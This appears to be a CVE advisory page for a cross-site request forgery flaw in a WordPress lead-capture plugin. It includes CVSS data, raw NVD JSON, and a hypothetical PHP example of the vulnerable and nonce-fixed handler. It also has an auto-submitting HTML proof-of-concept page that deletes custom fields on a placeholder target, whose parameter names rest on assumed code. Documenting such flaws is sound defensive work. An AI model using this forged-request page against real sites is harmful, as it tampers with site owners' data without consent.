Security Vulnerability Report
CVE-2025-13361 CVSS 4.3 MEDIUM


Published: 2025-12-21 04:16:04
Last Modified: 2026-04-15 00:35:42

Description

The Web to SugarCRM Lead plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing nonce validation on the custom field deletion functionality. This makes it possible for unauthenticated attackers to delete custom fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
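The root cause is the CWE-352 pattern the description names: a state-changing admin action that accepts any request carrying the right parameters, with no proof that the request originated from the plugin's own admin page. The following PHP is an added, hypothetical illustration and is not the plugin's code: the function names `wpscl_delete_custom_field_vulnerable` / `wpscl_delete_custom_field_fixed`, the option key `wpscl_custom_fields` and the nonce action string are assumptions. It shows the unguarded handler beside one hardened with the standard WordPress nonce and capability checks, plus the form that emits the nonce so legitimate deletes still succeed.

```php
<?php
// Added example (not the plugin's own code). Function names, the option key
// 'wpscl_custom_fields' and the nonce action string are assumptions.

// Vulnerable pattern: trusts any POST that carries the expected parameters.
// A forged request from another origin is indistinguishable from a real one,
// so an authenticated admin's browser will carry it out.
function wpscl_delete_custom_field_vulnerable() {
    $field_id = isset( $_POST['field_id'] ) ? absint( $_POST['field_id'] ) : 0;
    $fields   = get_option( 'wpscl_custom_fields', array() );
    unset( $fields[ $field_id ] );
    update_option( 'wpscl_custom_fields', $fields );
}

// Hardened pattern: require a nonce bound to this specific action and the
// capability an administrator needs. check_admin_referer() reads the
// '_wpnonce' request field, verifies it against the action, and dies with a
// 403 if it is missing, empty or forged, which is exactly the case the
// vulnerable handler accepts.
function wpscl_delete_custom_field_fixed() {
    check_admin_referer( 'wpscl_delete_custom_field' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'wpscl' ), 403 );
    }
    $field_id = isset( $_POST['field_id'] ) ? absint( $_POST['field_id'] ) : 0;
    $fields   = get_option( 'wpscl_custom_fields', array() );
    if ( isset( $fields[ $field_id ] ) ) {
        unset( $fields[ $field_id ] );
        update_option( 'wpscl_custom_fields', $fields );
    }
}

// The plugin's own admin page must emit the matching nonce, otherwise the
// hardened handler rejects legitimate deletes too. wp_nonce_field() writes
// the hidden '_wpnonce' input (and a referer field) for the same action.
function wpscl_render_delete_button( $field_id ) {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=wpscl-custom-fields' ) ) . '">';
    wp_nonce_field( 'wpscl_delete_custom_field' );
    echo '<input type="hidden" name="action" value="wpscl_delete_custom_field">';
    echo '<input type="hidden" name="field_id" value="' . absint( $field_id ) . '">';
    submit_button( __( 'Delete field', 'wpscl' ), 'delete', 'submit', false );
    echo '</form>';
}
```

The nonce check alone closes the CSRF issue because a third-party page cannot read the per-user, per-action token to include it in a forged form; the capability check is defence in depth so that a nonce leaked to a lower-privileged user still does not authorise the delete.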

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Web to SugarCRM Lead plugin for WordPress <= 1.0.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CSRF PoC for CVE-2025-13361 -->
<!-- This PoC demonstrates the CSRF vulnerability in Web to SugarCRM Lead plugin -->
<!DOCTYPE html>
<html>
<head>
  <title>CSRF Attack PoC - CVE-2025-13361</title>
</head>
<body>
  <h1>CSRF PoC for WordPress Web to SugarCRM Lead Plugin</h1>
  <p>This page will automatically submit a forged request to delete custom fields.</p>
  <form id="csrfForm" action="http://target-wordpress-site/wp-admin/admin.php" method="POST">
    <!-- Identify the plugin page -->
    <input type="hidden" name="page" value="wpscl-custom-fields">
    <!-- Custom field deletion action -->
    <input type="hidden" name="action" value="wpscl_delete_custom_field">
    <!-- Target field ID to delete (attacker controlled) -->
    <input type="hidden" name="field_id" value="1">
    <!-- CSRF token (missing nonce validation - this is the vulnerability) -->
    <!-- No nonce field or invalid nonce would be accepted due to missing validation -->
    <input type="hidden" name="_wpnonce" value="">
  </form>
  <script>
    // Auto-submit the form when page loads
    document.getElementById('csrfForm').submit();
    console.log('CSRF request sent');
  </script>
  <p>If you see this message, the request has been sent.</p>
</body>
</html>
<!-- Alternative: Simple GET request PoC (if supported) -->
<!-- http://target-wordpress-site/wp-admin/admin.php?page=wpscl-custom-fields&action=wpscl_delete_custom_field&field_id=1 -->

References

https://plugins.trac.wordpress.org/browser/web-to-sugarcrm-lead/tags/1.0.0/wpscl-admin-functions.php#L496
https://plugins.trac.wordpress.org/browser/web-to-sugarcrm-lead/trunk/wpscl-admin-functions.php#L496
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3423497%40web-to-sugarcrm-lead&new=3423497%40web-to-sugarcrm-lead
https://www.wordfence.com/threat-intel/vulnerabilities/id/b7c54b5d-ad73-44f1-afdb-01136ec0b9ae?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13361",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-21T04:16:04.350",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Web to SugarCRM Lead plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing nonce validation on the custom field deletion functionality. This makes it possible for unauthenticated attackers to delete custom fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-352"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/web-to-sugarcrm-lead/tags/1.0.0/wpscl-admin-functions.php#L496",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/web-to-sugarcrm-lead/trunk/wpscl-admin-functions.php#L496",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3423497%40web-to-sugarcrm-lead&new=3423497%40web-to-sugarcrm-lead",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b7c54b5d-ad73-44f1-afdb-01136ec0b9ae?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}